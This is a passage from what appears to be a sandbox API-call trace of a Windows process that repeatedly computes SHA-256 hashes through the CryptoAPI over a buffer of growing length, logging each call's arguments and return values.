Flags=0x8, Size=0x20) returned 0x32ad0140 [0190.257] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad0140, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0140, pdwDataLen=0xce0bc) returned 1 [0190.257] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.257] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0190.257] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822fd0) returned 1 [0190.257] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.257] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x940, dwFlags=0x0) returned 1 [0190.257] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.258] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad03b0 [0190.258] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad03b0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad03b0, pdwDataLen=0xce0bc) returned 1 [0190.258] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.258] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0190.258] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.258] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.258] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0x960, dwFlags=0x0) returned 1 [0190.258] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.258] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0170 [0190.258] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32ad0170, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0170, pdwDataLen=0xce0bc) returned 1 [0190.258] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.258] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.258] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.259] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.259] CryptHashData (hHash=0x3396f5f0, pbData=0x32349170, dwDataLen=0x980, dwFlags=0x0) returned 1 [0190.259] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0470 [0190.259] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32ad0470, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0470, pdwDataLen=0xce0bc) returned 1 [0190.259] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0190.259] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.259] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.260] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.260] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0190.260] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad01a0 [0190.260] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad01a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad01a0, pdwDataLen=0xce0bc) returned 1 [0190.260] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.260] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.260] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821dd0) returned 1 [0190.260] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.260] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0190.260] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0200 [0190.260] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32ad0200, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0200, pdwDataLen=0xce0bc) returned 1 [0190.260] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.260] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0190.260] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.261] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.261] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0190.261] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.261] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0290 [0190.261] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0290, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0290, pdwDataLen=0xce0bc) returned 1 [0190.261] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.261] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.261] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.262] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.262] CryptHashData (hHash=0x3396ee80, pbData=0x32349170, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0190.262] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.262] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0d70 [0190.262] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32ad0d70, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0d70, pdwDataLen=0xce0bc) returned 1 [0190.262] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0190.262] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.262] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.264] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.264] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0190.264] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0800 [0190.264] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32ad0800, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0800, pdwDataLen=0xce0bc) returned 1 [0190.264] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.265] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.265] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.265] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.265] CryptHashData (hHash=0x3396f4a0, pbData=0x32349170, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0190.265] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.265] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1100 [0190.265] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32ad1100, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1100, pdwDataLen=0xce0bc) returned 1 [0190.265] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0190.265] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.265] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.266] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.266] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0190.266] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.266] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0da0 [0190.266] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0da0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0da0, pdwDataLen=0xce0bc) returned 1 [0190.266] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.266] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.266] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.267] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.267] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0190.267] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0770 [0190.267] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32ad0770, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0770, pdwDataLen=0xce0bc) returned 1 [0190.267] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.267] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.267] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.267] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.267] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0190.267] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0e00 [0190.267] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0e00, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0e00, pdwDataLen=0xce0bc) returned 1 [0190.268] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.268] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.268] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.268] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.268] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0190.268] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad08f0 [0190.268] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32ad08f0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad08f0, pdwDataLen=0xce0bc) returned 1 [0190.268] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.268] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.268] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.269] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.269] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0190.269] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.269] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad10d0 [0190.269] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32ad10d0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad10d0, pdwDataLen=0xce0bc) returned 1 [0190.269] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.269] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.269] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338238d0) returned 1 [0190.270] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.270] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0190.270] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.270] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0dd0 [0190.270] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32ad0dd0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0dd0, pdwDataLen=0xce0bc) returned 1 [0190.270] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.270] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0190.270] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.271] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.271] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0190.271] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad09b0 [0190.271] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad09b0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad09b0, pdwDataLen=0xce0bc) returned 1 [0190.271] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.271] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.271] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338229d0) returned 1 [0190.271] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.271] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0190.271] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1130 [0190.271] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad1130, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1130, pdwDataLen=0xce0bc) returned 1 [0190.271] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.271] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0190.272] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.272] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.272] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0190.272] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0a10 [0190.272] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32ad0a10, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0a10, pdwDataLen=0xce0bc) returned 1 [0190.272] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.272] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.272] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.273] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.273] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0190.273] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.273] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad10a0 [0190.273] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad10a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad10a0, pdwDataLen=0xce0bc) returned 1 [0190.273] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.273] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.273] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.274] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.274] CryptHashData (hHash=0x3396f6d0, pbData=0x32349170, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0190.274] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0cb0 [0190.274] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32ad0cb0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0cb0, pdwDataLen=0xce0bc) returned 1 [0190.274] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0190.274] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.274] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.274] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.274] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0xbc0, dwFlags=0x0) returned 1 [0190.274] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad07a0 [0190.274] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32ad07a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad07a0, pdwDataLen=0xce0bc) returned 1 [0190.274] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.274] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.274] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338232d0) returned 1 [0190.275] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.275] CryptHashData (hHash=0x3396ee80, pbData=0x32349170, dwDataLen=0xbe0, dwFlags=0x0) returned 1 [0190.275] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.275] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0830 [0190.275] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32ad0830, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0830, pdwDataLen=0xce0bc) returned 1 [0190.275] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0190.275] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0190.275] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.276] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.276] CryptHashData (hHash=0x3396f890, pbData=0x32349170, dwDataLen=0xc00, dwFlags=0x0) returned 1 [0190.276] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.276] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0f20 [0190.276] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32ad0f20, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0f20, pdwDataLen=0xce0bc) returned 1 [0190.276] CryptDestroyHash (hHash=0x3396f890) returned 1 [0190.276] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.276] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.277] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.277] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0xc20, dwFlags=0x0) returned 1 [0190.277] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.277] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0ad0 [0190.277] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32ad0ad0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0ad0, pdwDataLen=0xce0bc) returned 1 [0190.277] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.277] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.277] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.277] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.277] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0xc40, dwFlags=0x0) returned 1 [0190.277] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.277] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, 